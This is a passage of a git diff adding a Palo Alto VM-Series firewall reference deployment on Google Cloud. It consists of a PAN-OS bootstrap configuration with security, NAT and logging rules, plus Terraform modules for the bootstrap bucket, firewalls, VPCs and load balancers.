+                  <rule-type>universal</rule-type>
+                  <log-end>yes</log-end>
+                  <log-setting>panorama</log-setting>
+                </entry>
+                <entry name="east-west" uuid="997fe29f-c6e6-47ae-b2cf-99a45aca32b6">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>spoke1-vpc</member>
+                    <member>spoke2-vpc</member>
+                  </source>
+                  <destination>
+                    <member>spoke1-vpc</member>
+                    <member>spoke2-vpc</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-setting>panorama</log-setting>
+                </entry>
+                <entry name="outbound" uuid="d7502b5e-6ba0-4f50-b649-8c1b92db0c4e">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>apt-get</member>
+                    <member>ssl</member>
+                    <member>web-browsing</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <action>allow</action>
+                  <disabled>no</disabled>
+                  <log-setting>panorama</log-setting>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="6817e13f-5b30-436d-9312-8a05f648cb2c">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <log-setting>panorama</log-setting>
+                </entry>
+                <entry name="interzone-default" uuid="e748ce44-cdbe-418b-906a-517f9b6e9695">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <log-setting>panorama</log-setting>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <application-override>
+              <rules/>
+            </application-override>
+            <decryption>
+              <rules/>
+            </decryption>
+            <tunnel-inspect>
+              <rules/>
+            </tunnel-inspect>
+            <authentication>
+              <rules/>
+            </authentication>
+            <nat>
+              <rules>
+                <entry name="tcp-222" uuid="f25682f2-22e1-4949-8332-dd44aeb1daa9">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-tcp-222</service>
+                  <nat-type>ipv4</nat-type>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke2-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                  <disabled>no</disabled>
+                </entry>
+                <entry name="tcp-221" uuid="0c48a434-bb95-4848-9178-377a5e99dfd9">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-tcp-221</service>
+                  <nat-type>ipv4</nat-type>
+                  <to-interface>ethernet1/1</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-vm</translated-address>
+                    <translated-port>22</translated-port>
+                  </dynamic-destination-translation>
+                  <disabled>no</disabled>
+                </entry>
+                <entry name="tcp-80" uuid="eb086485-03ba-47cc-b007-74e511a6db44">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>service-http</service>
+                  <nat-type>ipv4</nat-type>
+                  <to-interface>ethernet1/1</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>spoke1-intlb</translated-address>
+                    <translated-port>80</translated-port>
+                  </dynamic-destination-translation>
+                </entry>
+                <entry name="health-check" uuid="82746015-3c9b-49ea-a22c-0f4b324de242">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>gcp-health-probes</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>ethernet1/2</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>loopback-interface</translated-address>
+                  </dynamic-destination-translation>
+                  <description>No NAT on GCP LB health check.</description>
+                </entry>
+                <entry name="outbound" uuid="19a4885f-5d70-42ae-b7f2-df2235c37243">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <nat-type>ipv4</nat-type>
+                </entry>
+              </rules>
+            </nat>
+            <qos>
+              <rules/>
+            </qos>
+            <pbf>
+              <rules/>
+            </pbf>
+            <dos>
+              <rules/>
+            </dos>
+          </rulebase>
+          <address>
+            <entry name="gcp-health-probe-2">
+              <ip-netmask>130.211.0.0/22</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="gcp-health-probe-1">
+              <ip-netmask>35.191.0.0/16</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="loopback-interface">
+              <ip-netmask>100.64.0.1</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+              <description>Loopback interface for GLB healthcheck</description>
+            </entry>
+            <entry name="spoke1-intlb">
+              <ip-netmask>10.1.0.100</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vm">
+              <ip-netmask>10.1.0.2</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke1-vpc">
+              <ip-netmask>10.1.0.0/24</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vm">
+              <ip-netmask>10.2.0.2</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="spoke2-vpc">
+              <ip-netmask>10.2.0.0/24</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+          </address>
+          <address-group>
+            <entry name="gcp-health-probes">
+              <static>
+                <member>gcp-health-probe-1</member>
+                <member>gcp-health-probe-2</member>
+              </static>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+          </address-group>
+          <external-list/>
+          <region/>
+          <application-tag/>
+          <application-filter/>
+          <profile-group/>
+          <authentication-object/>
+          <tag>
+            <entry name="untrust">
+              <color>color20</color>
+            </entry>
+            <entry name="trust">
+              <color>color13</color>
+            </entry>
+            <entry name="gcp-resource">
+              <color>color24</color>
+            </entry>
+            <entry name="gcp-address">
+              <color>color3</color>
+            </entry>
+          </tag>
+          <application-status/>
+          <threats>
+            <vulnerability/>
+            <spyware/>
+          </threats>
+          <profiles>
+            <virus/>
+            <spyware/>
+            <vulnerability/>
+            <url-filtering/>
+            <custom-url-category/>
+            <file-blocking/>
+            <data-filtering/>
+            <data-objects/>
+            <hip-objects/>
+            <hip-profiles/>
+            <dos-protection/>
+            <decryption/>
+            <wildfire-analysis/>
+            <gtp/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+  <mgt-config ptpl="gcp-common">
+    <users ptpl="gcp-common">
+      <entry name="paloalto" ptpl="gcp-common">
+        <permissions ptpl="gcp-common">
+          <role-based ptpl="gcp-common">
+            <superuser ptpl="gcp-common">yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0</phash>
+      </entry>
+      <entry name="admin">
+        <phash>*</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8=</public-key>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared ptpl="gcp-common">
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <profiles>
+        <entry name="panorama">
+          <match-list>
+            <entry name="all-auth">
+              <log-type>auth</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-data">
+              <log-type>data</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-threat">
+              <log-type>threat</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-traffic">
+              <log-type>traffic</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-tunnel">
+              <log-type>tunnel</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-url">
+              <log-type>url</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+            <entry name="all-wildfire">
+              <log-type>wildfire</log-type>
+              <filter>All Logs</filter>
+              <send-to-panorama>yes</send-to-panorama>
+            </entry>
+          </match-list>
+        </entry>
+      </profiles>
+    </log-settings>
+  </shared>
+</config>
diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_common.tf b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf
new file mode 100644
index 00000000..bff4b839
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf
@@ -0,0 +1,131 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for firewalls
+module "bootstrap_common" {
+  source        = "./modules/gcp_bootstrap/"
+  bucket_name   = "fw-bootstrap-common"
+  file_location = "bootstrap_files/"
+  config        = ["init-cfg.txt", "bootstrap.xml"]
+  license       = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create  firewalls
+module "fw_common" {
+  source = "./modules/vmseries/"
+  names  = var.fw_names_common
+  zones = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  subnetworks = [
+    module.vpc_untrust.subnetwork_self_link[0],
+    module.vpc_mgmt.subnetwork_self_link[0],
+    module.vpc_trust.subnetwork_self_link[0]
+  ]
+  machine_type          = var.fw_machine_type
+  bootstrap_bucket      = module.bootstrap_common.bucket_name
+  mgmt_interface_swap   = "enable"
+  ssh_key               = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+  image                 = "${var.fw_image}-${var.fw_panos}"
+  nic0_public_ip        = true
+  nic1_public_ip        = true
+  nic2_public_ip        = false
+  create_instance_group = true
+
+  dependencies = [
+    module.bootstrap_common.completion,
+  ]
+}
+
+module "lb_inbound" {
+  source       = "./modules/lb_tcp_external/"
+  region       = var.regions[0]
+  name         = var.extlb_name
+  service_port = 80
+  instances    = module.fw_common.vm_self_link
+  providers = {
+    google = google-beta
+  }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create 2 internal load balancers. LB-1 is A/A for internet.  LB-2 is A/P for e-w.
+module "lb_outbound" {
+  source            = "./modules/lb_tcp_internal/"
+  name              = var.intlb_name
+  subnetworks       = [module.vpc_trust.subnetwork_self_link[0]]
+  all_ports         = true
+  ports             = []
+  health_check_port = "22"
+  network           = module.vpc_trust.vpc_id
+
+  backends = {
+    "0" = [
+      {
+        group    = module.fw_common.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.fw_common.instance_group[1]
+        failover = false
+      }
+    ]
+    "1" = [
+      {
+        group    = module.fw_common.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.fw_common.instance_group[1]
+        failover = true
+      }
+    ]
+  }
+  providers = {
+    google = google-beta
+  }
+}
+
+
+#-----------------------------------------------------------------------------------------------
+# Create routes route to internal LBs. Routes will be exported to spokes via GCP peering.
+resource "google_compute_route" "default" {
+  name         = "${var.intlb_name}-default"
+  dest_range   = "0.0.0.0/0"
+  network      = module.vpc_trust.vpc_self_link
+  next_hop_ilb = module.lb_outbound.forwarding_rule[0]
+  priority     = 99
+  provider     = google-beta
+}
+
+resource "google_compute_route" "eastwest" {
+  name         = "${var.intlb_name}-eastwest"
+  dest_range   = "10.0.0.0/8"
+  network      = module.vpc_trust.vpc_self_link
+  next_hop_ilb = module.lb_outbound.forwarding_rule[1]
+  priority     = 99
+  provider     = google-beta
+}
+
+
+#-----------------------------------------------------------------------------------------------
+# Outputs to terminal
+output EXT-LB {
+  value = "http://${module.lb_inbound.forwarding_rule_ip_address}"
+}
+
+output MGMT-FW1 {
+  value = "https://${module.fw_common.nic1_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+  value = "https://${module.fw_common.nic1_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE1 {
+  value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
+output SSH-TO-SPOKE2 {
+  value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf
new file mode 100644
index 00000000..075033ef
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf
@@ -0,0 +1,35 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc_mgmt" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.mgmt_vpc
+  subnets              = var.mgmt_subnet
+  cidrs                = var.mgmt_cidr
+  regions              = var.regions
+  allowed_sources      = var.mgmt_sources
+  allowed_protocol     = "TCP"
+  allowed_ports        = ["443", "22"]
+}
+
+module "vpc_untrust" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.untrust_vpc
+  subnets              = var.untrust_subnet
+  cidrs                = var.untrust_cidr
+  regions              = var.regions
+  allowed_sources      = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.trust_vpc
+  subnets              = var.trust_subnet
+  cidrs                = var.trust_cidr
+  regions              = var.regions
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/images/diagram.png b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png
new file mode 100644
index 00000000..be6e973b
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png differ
diff --git a/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png
new file mode 100644
index 00000000..28539794
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png differ
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+  bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  name          = local.bucket_name
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = length(var.config) > 0 ? length(var.config) : "0"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = length(var.content) > 0 ? length(var.content) : "0"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = length(var.license) > 0 ? length(var.license) : "0"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+  count  = length(var.software) > 0 ? length(var.software) : "0"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+  count   = length(var.config) == 0 ? 1 : 0
+  name    = "config/"
+  content = "config/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count   = length(var.content) == 0 ? 1 : 0
+  name    = "content/"
+  content = "content/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count   = length(var.license) == 0 ? 1 : 0
+  name    = "license/"
+  content = "license/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count   = length(var.software) == 0 ? 1 : 0
+  name    = "software/"
+  content = "software/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    google_storage_bucket.bootstrap,
+    google_storage_bucket_object.config_full,
+    google_storage_bucket_object.content_full,
+    google_storage_bucket_object.license_full,
+    google_storage_bucket_object.software_full,
+    google_storage_bucket_object.config_empty,
+    google_storage_bucket_object.content_empty,
+    google_storage_bucket_object.license_empty,
+    google_storage_bucket_object.software_empty,
+  ]
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..ef7f162d
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output completion {
+  value = null_resource.dependency_setter.id
+}
+
+output bucket_name {
+  value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..0db2b8fd
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable bucket_name {
+}
+
+variable file_location {
+}
+
+variable config {
+  type    = list(string)
+  default = []
+}
+
+variable content {
+  type    = list(string)
+  default = []
+}
+
+variable license {
+  type    = list(string)
+  default = []
+}
+
+variable software {
+  default = []
+}
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf
new file mode 100755
index 00000000..cc717264
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf
@@ -0,0 +1,39 @@
+
+locals {
+  health_check_port = var.health_check["port"]
+}
+
+resource "google_compute_forwarding_rule" "default" {
+  project               = var.project
+  name                  = var.name
+  target                = google_compute_target_pool.default.self_link
+  load_balancing_scheme = "EXTERNAL"
+  port_range            = var.service_port
+  region                = var.region
+  ip_address            = var.ip_address
+  ip_protocol           = var.ip_protocol
+}
+
+resource "google_compute_target_pool" "default" {
+  project          = var.project
+  name             = var.name
+  region           = var.region
+  session_affinity = var.session_affinity
+  instances = var.instances
+  health_checks = var.disable_health_check ? [] : [google_compute_http_health_check.default.0.self_link]
+}
+
+resource "google_compute_http_health_check" "default" {
+  count   = var.disable_health_check ? 0 : 1
+  project = var.project
+  name    = "${var.name}-hc"
+
+  check_interval_sec  = var.health_check["check_interval_sec"]
+  healthy_threshold   = var.health_check["healthy_threshold"]
+  timeout_sec         = var.health_check["timeout_sec"]
+  unhealthy_threshold = var.health_check["unhealthy_threshold"]
+
+  port         = local.health_check_port == null ? var.service_port : local.health_check_port
+  request_path = var.health_check["request_path"]
+  host         = var.health_check["host"]
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf
new file mode 100644
index 00000000..0ab49899
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf
@@ -0,0 +1,7 @@
+output forwarding_rule {
+  value = google_compute_forwarding_rule.default.*.self_link
+}
+
+output forwarding_rule_ip_address {
+  value = google_compute_forwarding_rule.default.ip_address
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf
new file mode 100644
index 00000000..2fc153ae
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf
@@ -0,0 +1,70 @@
+
+variable project {
+  type        = string
+  description = "The project to deploy to, if not set the default provider project is used."
+  default     = ""
+}
+
+variable region {
+  type        = string
+  description = "Region used for GCP resources."
+}
+
+variable name {
+  type        = string
+  description = "Name for the forwarding rule and prefix for supporting resources."
+}
+
+variable service_port {
+  type        = number
+  description = "TCP port your service is listening on."
+}
+
+variable session_affinity {
+  type        = string
+  description = "How to distribute load. Options are `NONE`, `CLIENT_IP` and `CLIENT_IP_PROTO`"
+  default     = "NONE"
+}
+
+variable disable_health_check {
+  type        = bool
+  description = "Disables the health check on the target pool."
+  default     = false
+}
+
+variable health_check {
+  description = "Health check to determine whether instances are responsive and able to do work"
+  type = object({
+    check_interval_sec  = number
+    healthy_threshold   = number
+    timeout_sec         = number
+    unhealthy_threshold = number
+    port                = number
+    request_path        = string
+    host                = string
+  })
+  default = {
+    check_interval_sec  = null
+    healthy_threshold   = null
+    timeout_sec         = null
+    unhealthy_threshold = null
+    port                = null
+    request_path        = null
+    host                = null
+  }
+}
+
+variable ip_address {
+  description = "IP address of the external load balancer, if empty one will be assigned."
+  default     = null
+}
+
+variable ip_protocol {
+  description = "The IP protocol for the frontend forwarding rule: TCP, UDP, ESP, AH, SCTP or ICMP."
+  default     = "TCP"
+}
+
+variable instances {
+  type        = list(string)
+  default     = null
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf
new file mode 100755
index 00000000..bfc88575
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf
@@ -0,0 +1,34 @@
+resource "google_compute_health_check" "default" {
+  name = "${var.name}-check-0"
+
+  tcp_health_check {
+    port = var.health_check_port
+  }
+}
+resource "google_compute_region_backend_service" "default" {
+  count         = length(var.backends)
+  name          = "${var.name}-${count.index}"
+  health_checks = [google_compute_health_check.default.self_link]
+  network       = var.network
+
+  dynamic "backend" {
+    for_each = var.backends[count.index]
+    content {
+      group    = lookup(backend.value, "group")
+      failover = lookup(backend.value, "failover")
+    }
+  }
+  session_affinity = "NONE"
+}
+
+resource "google_compute_forwarding_rule" "default" {
+  count                 = length(var.backends)
+  name                  = "${var.name}-all-${count.index}"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = var.ip_address
+  ip_protocol           = var.ip_protocol
+  all_ports             = var.all_ports
+  ports                 = var.ports
+  subnetwork            = var.subnetworks[0]
+  backend_service       = google_compute_region_backend_service.default[count.index].self_link
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf
new file mode 100644
index 00000000..08589a14
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf
@@ -0,0 +1,4 @@
+output forwarding_rule {
+  value = google_compute_forwarding_rule.default.*.self_link
+}
+
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf
new file mode 100644
index 00000000..1e634c77
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf
@@ -0,0 +1,37 @@
+variable name {
+}
+
+variable health_check_port {
+  default = "22"
+}
+
+variable backends {
+  description = "Map backend indices to list of backend maps."
+  type = map(list(object({
+    group    = string
+    failover = bool
+  })))
+}
+
+variable subnetworks {
+  type = list(string)
+}
+
+variable ip_address {
+  default = null
+}
+
+variable ip_protocol {
+  default = "TCP"
+}
+variable all_ports {
+  type = bool
+}
+variable ports {
+  type    = list(string)
+  default = []
+}
+
+variable network {
+  default = null
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf
new file mode 100644
index 00000000..2f42125b
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf
@@ -0,0 +1,45 @@
+resource "google_compute_instance" "default" {
+  count                     = length(var.names)
+  name                      = element(var.names, count.index)
+  machine_type              = var.machine_type
+  zone                      = element(var.zones, count.index)
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata_startup_script   = var.startup_script
+
+  metadata = {
+    serial-port-enable = true
+    ssh-keys           = var.ssh_key
+  }
+
+  network_interface {
+    subnetwork = element(var.subnetworks, count.index)
+  }
+
